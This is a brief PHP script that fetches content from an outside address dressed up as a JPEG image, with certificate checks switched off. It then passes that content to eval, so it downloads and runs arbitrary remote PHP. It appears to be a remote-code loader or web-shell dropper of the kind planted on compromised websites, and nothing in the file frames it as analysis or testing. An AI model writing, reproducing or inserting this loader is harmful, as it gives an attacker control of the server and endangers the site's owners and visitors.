<?php
session_start();

function geturlsinfo($url) {
    $conn = curl_init($url);
    curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($conn, CURLOPT_USERAGENT, "Mozilla/5.0");
    curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0);
    $data = curl_exec($conn);
    curl_close($conn);
    return $data;
}

$url = "https://examples2.pages.dev/1.jpg";
$content = geturlsinfo($url);
eval('?>' . $content);
